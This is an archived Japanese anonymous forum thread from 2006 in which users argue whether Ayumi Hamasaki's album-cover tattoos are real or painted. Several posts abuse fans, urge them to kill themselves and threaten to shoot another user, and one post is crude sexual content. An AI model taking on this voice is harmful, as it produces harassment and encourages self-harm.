ティムもTだし使いまわしできてるね

183 :どっちの名無しさん?:2006/11/15(水) 15:14:35
あゅダサ<なった

184 :どっちの名無しさん?:2006/11/15(水) 16:12:20
長瀬はジャニーズだからジャニさんがそういう事させないよ。

185 :どっちの名無しさん?:2006/11/15(水) 16:16:37
>>181
その画像見せて(><)

186 :どっちの名無しさん?:2006/11/15(水) 16:56:20
月    席替え          ヒソヒソ・・・        「え?まだ居たの?」
曜          グループ学習   歌えないカラオケ
の   調理実習                 体   「あれ?今日呼んだっけ?」
朝             修学旅行   怨み 育         休       弁当
 コソコソ・・・            罰ゲーム告白           み  「調子乗ってんじゃねーよ」
        「なんでお前もくんの?」       図       時間
                              書               ト    「えーと、誰?」
  二人組み       好きだったあの子    室       ザワ・・・   イ   鬱
     寝たふり    「なんか臭くない?」   / ̄ ̄ ̄\   落     レ
MDが友達   「おいお前コンビニ行ってこい」/ ─    ─ \  書         飲まされた泥水
                           /  <○>  <○>  \ き
   画鋲   机に花   キモイ・・・      |    (__人__)    |  隠された所持品   
ザワザワ・・・・     ガヤガヤ・・・        \    ` ⌒´    /「なにアイツ?」   
         アドレス帳      嫉妬   /              \        保健のテスト100点

187 :どっちの名無しさん?:2006/11/15(水) 17:10:25
よごれ

188 :どっちの名無しさん?:2006/11/15(水) 18:48:30
>>185転送禁止になってから無理だよ。
送ろうと思えば出来ない事もないが一応約束は守らないとね……。
多分アンチに頼めば拾ってくるよ!

189 :どっちの名無しさん?:2006/11/15(水) 19:36:37
ファンがayuの足引っ張るようなことするなよ

190 :どっちの名無しさん?:2006/11/15(水) 22:49:11
発見した
http://p1.tarekomi.jp/image.php/4/302433/455ae35b93145/r

191 :どっちの名無しさん?:2006/11/15(水) 23:00:48
190 :どっちの名無しさん?:2006/11/15(水) 22:49:11
発見した
http://p1.tarekomi.jp/image.php/4/302433/455ae35b93145/r

Aマークのロゴは本物の外ゥ-確実ね。。。

192 :どっちの名無しさん?:2006/11/18(土) 11:05:03
TとAの部分が本物だとしたらスゴイ絆だと思う。
しかも今回はこんな風に公開してるわけだし…
いくらユニコーンがメインだとしても解る人には解るでしょ

193 :どっちの名無しさん?:2006/11/18(土) 12:35:42
かいて貰ったって
かいてあった

本物のタトゥーぢゃ
ないよ〜

194 :どっちの名無しさん?:2006/11/18(土) 23:29:35
Aのタトゥーは本物でユニコーンはペイント?

195 :どっちの名無しさん?:2006/11/18(土) 23:50:37
Aの部分は本物でユニコーンが絵だよ

196 :どっちの名無しさん?:2006/11/19(日) 00:10:35
タトゥー入れちゃう人はあまり好かないな・・・

197 :どっちの名無しさん?:2006/11/19(日) 00:12:44
痛そうだよね 体も頭も

198 :どっちの名無しさん?:2006/11/19(日) 00:13:05
http://www.degitalscope.com/~mbspro/userfiles_res/hamapaku/31011.jpg

199 :どっちの名無しさん?:2006/11/19(日) 02:38:00
http://pr2.cgiboy.com/S/2225549/

200 :どっちの名無しさん?:2006/11/19(日) 03:50:55
あゆ姫鬼かぱLILI☆☆☆
さすが世界中のみンなの
あこがれだね☆☆☆
あゆ姫以外にもウこれ以上
かわゆくて歌のうまLI歌姫なンて
現れなLIよ☆☆☆☆(^ε^)
あゆ姫は永遠にのみンなの
かわゆLIかわゆLIお姫様☆☆☆☆

201 :どっちの名無しさん?:2006/11/19(日) 07:50:26
っていうか、タトゥー本物は、いれてないでしょ
ヘソピも開けてないしタトゥーもいれない希ガス

それに>>191の左側の画像のヤツって何年も前のアユだし、その時、Aのロゴいれてるなら、もう、とっくの昔にバレて“タトゥーいれてる”って話が出るしね
だから全部ペイントでFA

202 :どっちの名無しさん?:2006/11/19(日) 11:03:55
>>196
俺も
確か安室は本物の刺青彫ったんだよな
ファンはなんとも思わないんだろうか
俺なら冷める

203 :どっちの名無しさん?:2006/11/19(日) 11:10:10
なんちゃってタトゥーなんかクソ!ハマーにそんな勇気は、ありゃしない!

204 :どっちの名無しさん?:2006/11/19(日) 11:13:28
そんな勇気いらねーw
あゆたんこれからも彫らないでくれ

205 :どっちの名無しさん?:2006/11/19(日) 11:15:27
>>202
安室はDQNファンが多いから
むしろカッコイイと思ってるやつ多数

206 :どっちの名無しさん?:2006/11/19(日) 12:29:25
>>205安室ガリでゴリラ顔〜あいつの顔みてるとムカつく殴りたい

207 :どっちの名無しさん?:2006/11/19(日) 12:52:24
何にせよ、彼女が彫ったりしたら別れを考える。

208 :どっちの名無しさん?:2006/11/19(日) 13:45:41
>>207
おれも

209 :どっちの名無しさん?:2006/11/19(日) 15:38:47
安室のタトゥ-は本物だよ。私は安室のファンだけど、浜崎も好き。安室がタトウー入れた時、別に熱は冷めなかったし、逆に自分の生き方を身体に刻んでるのが凄いと思った。忘れられない、忘れちゃいけないからこそ覚悟の上で彫ったんだから。今は、ファッションで入れる人もいるし。

210 :どっちの名無しさん?:2006/11/19(日) 19:34:46
なんかハマってなんでも上っ面だけって感じだな。
今回のもカッコイイからとりあえずお手軽に描いてもらいましたって感じだし。
やることなすこと全てが中途半端。

211 :どっちの名無しさん?:2006/11/19(日) 21:36:59
あゆと同じタトゥー彫ろうっかなぁ〜!

212 :どっちの名無しさん?:2006/11/19(日) 23:24:49
>>211
彫ればwwww彫って人生台無しにしろww

213 :どっちの名無しさん?:2006/11/19(日) 23:36:15
あなたと違って幸せになりますから〜ご心配なくw
周りでもあゆと同じタトゥー彫りたがってる人達続出中だしね〜!

214 :どっちの名無しさん?:2006/11/19(日) 23:40:39
>>213
あたしもあゆと同じにしたい〜!

けど彫る勇気ないからグッズとかでタトゥーシールみたいなの出して欲しいな

215 :どっちの名無しさん?:2006/11/19(日) 23:40:45
うそこけ

216 :どっちの名無しさん?:2006/11/19(日) 23:40:52
>>213
今が楽しければいいと言う馬鹿特有の発想かww
お前等に未来はないから彫ればwwwww彫っちゃえよwwwww

217 :どっちの名無しさん?:2006/11/19(日) 23:45:04
これは自演だろ
>>213=>>214

218 :どっちの名無しさん?:2006/11/20(月) 00:26:38
http://www.degitalscope.com/~mbspro/userfiles_res/hamapaku/29131.jpg

あゆステキ〜ww

219 :どっちの名無しさん?:2006/11/20(月) 00:49:48
アンチの自作自演乙

220 :どっちの名無しさん?:2006/11/20(月) 00:50:47
http://022.gamushara.net/imgview.php?board=talents&file=b000jvsvlu_01__ss500_sclzzzzzzz_v36143206_.jpg
これ、えらく胸下だし細すぎじゃない???????
イジくってんのかね??

221 :どっちの名無しさん?:2006/11/20(月) 01:53:11
>>216
みたいなお節介な人っているよね・・・
自分があゆちゃんと同じタトゥー入れようが、あなたには全く関係の無い事だと思うんですけどw



222 :まりあ様:2006/11/20(月) 02:03:23
まりあが一部は本当のタトゥーだって事を今から証明してあげるね30分待ってね

223 :どっちの名無しさん?:2006/11/20(月) 02:03:59
>>220
細っ! まぁジャケはいじるからねえ
でもかっこいいね
モデルみたいで

224 :まりあ様:2006/11/20(月) 02:29:13
眠くなったから明日にする
Aとハートマークのタトゥーを未だに信じられない人は明日現実が分かるでしょう…

225 :どっちの名無しさん?:2006/11/20(月) 02:53:47
>>221
そうだな。お前がこの先不幸になろうが死のうが知ったことではないwww
だから早く彫れよwwインチキタレント浜崎と同化しろよwwwwwwww
まぁタダの張ったりだろうから彫らないだろうがなwww

226 :どっちの名無しさん?:2006/11/20(月) 03:06:44
ファン自ら浜崎を貶めるようなことやファンが減るような事をしちゃダメだよ・・・

227 :どっちの名無しさん?:2006/11/20(月) 03:12:52
>>221
浜崎気取りでタツゥー入れてもね・・・芸能人じゃないんだし
一般社会じゃマトモに相手されないよ。p水や風俗なら問題ない
だろうけどね。
髪型やメイクうあファッション真似てるぐらいのほうがいいと思うよ。


228 :まりあ:2006/11/20(月) 03:24:30
>>226そっか
じゃあやめるね
ただ自分はそれもあゆだと受け入れてるからさ
彼女らしさや彼女の証でもあるんだから
ファンが認めてあげなくて誰が理解するの?
タトゥーごときで嫌いになったり引く位のレベルのファンなら今すぐやめて欲しいって思ってしまう

229 :どっちの名無しさん?:2006/11/20(月) 03:30:06
引いてるのはファンじゃねえよ。

230 :どっちの名無しさん?:2006/11/20(月) 03:52:56
>>228
本人が公に言ってるんじゃなきゃ、
整形なにが悪い、パクリ何が悪い、って言ってるレベルと同じと思われるよ。

231 :どっちの名無しさん?:2006/11/20(月) 03:54:53
俺はあゆファンだけどタトゥーなんか絶対に反対だ
ただの「絵」で良かったよ

タトゥーごときじゃねえよDQN

232 :どっちの名無しさん?:2006/11/20(月) 03:56:27
あゆ姫のにゅ-
あるばむの曲
もちぜえンぶ/:
落とシたお

とリまはャく'
発売日こなLIヵナ
オ淨ヵマ†

233 :まりあ:2006/11/20(月) 04:01:19
ごめん自分はヲタだから
あゆの事なら何でも受け入れてしまうんだよね
痛いって分かってるんだけど
2004年から入れてるから今まで気付いてないファンもファンだなって感じだけど隠すからには見せたくない理由があったんだろうけどね

234 :どっちの名無しさん?:2006/11/20(月) 04:09:46
まりあ=タトゥーが本物だと言い張るアンチ工作員

235 :どっちの名無しさん?:2006/11/20(月) 04:24:01
>>234
は、もしあゆが本物のタトゥー入れてたらファンやめちゃう訳?
私はあゆの全てが大好きだから、あゆと同じ物入れようと検討中。
永遠にあゆと一緒だよ〜ン♪

236 :どっちの名無しさん?:2006/11/20(月) 04:41:13
っていうか本物いれてないんだから、そんな話してもねぇ…


237 :まりあ:2006/11/20(月) 05:05:43
アンチ呼ばわりは嫌だからやっぱり明日載せるね
自分で確認して貰えるように分かりやすく教えるから

238 :どっちの名無しさん?:2006/11/20(月) 05:25:14
正義感ぶってるこういうバカが一番迷惑だよなあ。


239 :どっちの名無しさん?:2006/11/20(月) 05:32:26
>>237
冷静に考えればそういうことすればするほどayuの迷惑になるって気づいて。
いらないアンチが増えるだけだし、また変な噂が立つじゃない。

240 :まりあ:2006/11/20(月) 05:55:02
もう
載せなければいいの?
自分はどっちでもいいけどアンチ呼ばわりされるのは嫌だ
あゆが困るならやめるか
って何回もうざくてごめん

241 :どっちの名無しさん?:2006/11/20(月) 06:02:20
あゆ、もうサウナ入れないねK

242 :どっちの名無しさん?:2006/11/20(月) 06:07:59
>>191をよく見ろよ!
ロゴの位置が右と左じゃ違うじゃねぇか

243 :どっちの名無しさん?:2006/11/20(月) 06:32:52
ホントだぁ
もう一度よく見たら位置、違うしw左側の方が右側のロゴより上の位置に描かれてる…
やっぱりロゴも偽だね。

244 :どっちの名無しさん?:2006/11/20(月) 10:25:05
ただの画なのにこれ見よがしにするところが浜詐欺たる所以

あと、こんなの置いておきますねw

Shakira/Laundry Service
ttp://www.hmv.co.jp/product/detail.asp?sku=622416&image=1

245 :どっちの名無しさん?:2006/11/20(月) 10:51:39
馬鹿オタがカス浜崎の真似をしてタトゥー彫って人生終わらせても知ったことではない
むしろ社会から蔑みの目で見られ唾棄されるのを願うwwwそして自殺すればいいww
浜崎はこの先の人生働かなくても生きてくだけの金があるからタトゥー入れても馬鹿だなだけで済むが
お前等痛いカスオタは何もないのにタトゥーを入れたがるww
既に彫っちまった馬鹿は自分の浅はかな決断を悔いて真っ暗な人生を歩めwwww
これから彫ることを考えてるカス共はようく考えるんだなwwwww
ちなみ浜崎はヘタレだから実際彫っておらずショボイ絵を描いただけだがなwww

246 :どっちの名無しさん?:2006/11/20(月) 11:43:09
ババア

247 :どっちの名無しさん?:2006/11/20(月) 12:13:54
まあ、よかったよ
本当にあゆは彫らなくて…

248 :どっちの名無しさん?:2006/11/20(月) 12:22:25
>>245 ←こいつ、かなり病んでますね
自殺すんのは お・ま・え だよ^^
カスの中のカスさん☆

249 :どっちの名無しさん?:2006/11/20(月) 12:31:27
>>245はかなり自分の人生うまく行ってないんだろうねw
だから、他人のことそこまで言えるんだな
この世で一番(´・ω・)カワイソスな人

250 :どっちの名無しさん?:2006/11/20(月) 12:41:52
>>236>>238>>247
同意

251 :どっちの名無しさん?:2006/11/20(月) 16:06:29
>>244
「これ見よがしに」ですかw
今回のアルバムの為に描いたんだからジャケ写にするのは当たり前じゃん。

252 :どっちの名無しさん?:2006/11/20(月) 16:15:54
>>243
あゆたんが本物の刺青なんか彫るわけないよ
痛いのとか絶対苦手だろうしな
注射も恐がるよ

253 :どっちの名無しさん?:2006/11/20(月) 20:20:53
浜崎ダサッwユニコーンってw

254 :どっちの名無しさん?:2006/11/20(月) 20:22:50
>>248-249
馬鹿に何を言っても無駄だなwwwwwwwwwwww
お先真っ暗な糞人生に幸アレwwwwwwwwwwwwwwwwwwwwwwwwwwww
ハマオタって非常識の塊だからタトゥー彫ることがどういうことか分からんのだろうなwww


255 :どっちの名無しさん?:2006/11/20(月) 20:59:08
てか友達とかがタトゥーしてたら普通に凄いと思って見ると思うけどね。


256 :どっちの名無しさん?:2006/11/21(火) 00:05:07
>>255
人事だからなwww


257 :いずみですぅぅ:2006/11/21(火) 00:46:14
顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏http://photo.awalker.jp/pup.php?ID=ayuayu&serial=201989&c_num=864顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏

258 :どっちの名無しさん?:2006/11/21(火) 00:58:58
>>254
うわっっ また来たの〜? 
お前の不幸が移りそうだから来ないでえぇ〜

あと、お前は頭が悪すぎるから勘違いなさってるようですが、自分はタトゥー彫ることがいい事だとは思ってませんからw残念でした〜*:.。:*・゚・*!!! 

だが、これだけは言える
タトゥー彫ってる人間>>>>>>>>>>>|越えられない壁>>>>>>>>>>>お前


259 :いずみですぅ茸茸:2006/11/21(火) 01:49:23
顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏http://photo.awalker.jp/pup.php?ID=ayuayu&serial=201989&c_num=864顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏顏

260 :どっちの名無しさん?:2006/11/21(火) 01:51:43
>>252
自分でMかもって言ってたから、結構痛いの好きかも?

261 :どっちの名無しさん?:2006/11/21(火) 01:53:19
その痛いのとMを一緒にするなよ

262 :ダンディズム:2006/11/21(火) 01:54:26
あゆ姫は可愛いMちゃんなのさ☆☆ だから僕の馬なみの下半身についてるものが好きなのさ☆☆ ダンディ様の馬並みのデカイもので、たくさんしてあげなきゃ駄目なのさベイビー☆☆(笑)

263 :どっちの名無しさん?:2006/11/21(火) 03:51:47
>>258
早く彫って社会からつまはじきにされろよwwwwww
彫る度胸もないくせに御託並べてんなよwwバーーーーーーーーーーーーーーーカ
世間はな
俺様>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>へタレ浜崎&カスオタ
なんだよwwwwwwwwwwwwwクズ共wwwwwwwwwwwww

264 :どっちの名無しさん?:2006/11/21(火) 04:26:57
>>263
必死必死w
お前はもう社会からつまはじきにされてるクズだろうが。何言っちゃってるんだかw

265 :どっちの名無しさん?:2006/11/21(火) 04:41:17
>>263
厨  房  は  早  く  寝  な  さ  い


266 :どっちの名無しさん?:2006/11/21(火) 10:14:33
>>264
そんなのはどうでもいいから早く彫れよwwwwwwwwwww
どうせ彫る気ないんだろwwww怖気付いたのかwwww
ゴミの真似をして人生を終わらせるゴミ虫共wwwwwwwww

267 :どっちの名無しさん?:2006/11/21(火) 15:13:13
刺青はNGで整形はOK?

268 :どっちの名無しさん?:2006/11/21(火) 17:21:19
刺青って…ヤクザの紋紋みたいな。

269 :どっちの名無しさん?:2006/11/21(火) 17:28:41
>>266
お前彫ってるのか?
ヤクザっぽいもんなお前

270 :どっちの名無しさん?:2006/11/21(火) 18:40:11
いちいちアンチの相手すんなよ


271 :どっちの名無しさん?:2006/11/22(水) 16:14:02
あゆのVoyageジャケの馬はノンツノ。だから何?

272 :ダンディズム:2006/11/22(水) 16:44:54
タトゥーはかっこいいさベイビー☆ でもダンディは痛いのが苦手なのさ☆ きっ君たちの我慢強さが素敵さ☆ベイビー

273 :どっちの名無しさん?:2006/11/22(水) 16:49:22
あゆのものまねで大晦日に出ます。
http://photo.awalker.jp/pup.php?ID=ayuayu&serial=201989&c_num=864

274 :どっちの名無しさん?:2006/11/22(水) 20:40:52
桐生一馬の龍>>>>>>>>>>>>>>安室のだせえタトゥー(笑)

275 :どっちの名無しさん?:2006/11/24(金) 01:22:51
半分ハートの中にπマークのやつは本物だよ☆


276 :どっちの名無しさん?:2006/11/24(金) 01:28:50
ヤクザは嫌いだが桐生一馬はかっこええな
ヤクザがみんなあんなのだったらいいのに

277 :どっちの名無しさん?:2006/11/24(金) 03:32:15
桐生さん声渋いよなぁ

278 :どっちの名無しさん?:2006/11/24(金) 05:47:28
>>205死ね!!!!!!!ピストルで撃ち殺すぞ。安室奈美恵より

279 :どっちの名無しさん?:2006/11/30(木) 17:09:57
Secretのブックレットにタトゥーがメインで出てるw


280 :どっちの名無しさん?:2006/12/04(月) 01:15:27
本物っぽいね…

281 :どっちの名無しさん?:2006/12/04(月) 02:21:58
親からもらった大事な身体を傷つけるような奴はDQNだけ

282 :どっちの名無しさん?:2006/12/04(月) 02:22:37
>>280ロゴとハートら形を変えてるけど本物の可能性ある。
ユニコーンの足の形が不自然だし。
しかもブックレット見て分かったけどロゴと足が不自然なほど黒い。
明らかに被せて描いた感じだね。
翼は多分描いてるだけ。

283 :どっちの名無しさん?:2006/12/04(月) 21:15:22
彫り師が四時間かけて書いた絵だよ


284 :どっちの名無しさん?:2006/12/05(火) 01:11:18
全て偽物の浜崎www自身を良く表してるwww

285 :どっちの名無しさん?:2006/12/05(火) 01:29:38
どこの彫り師がお勧めですか?

286 :どっちの名無しさん?:2007/01/09(火) 22:38:39
晒し揚げ

51 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)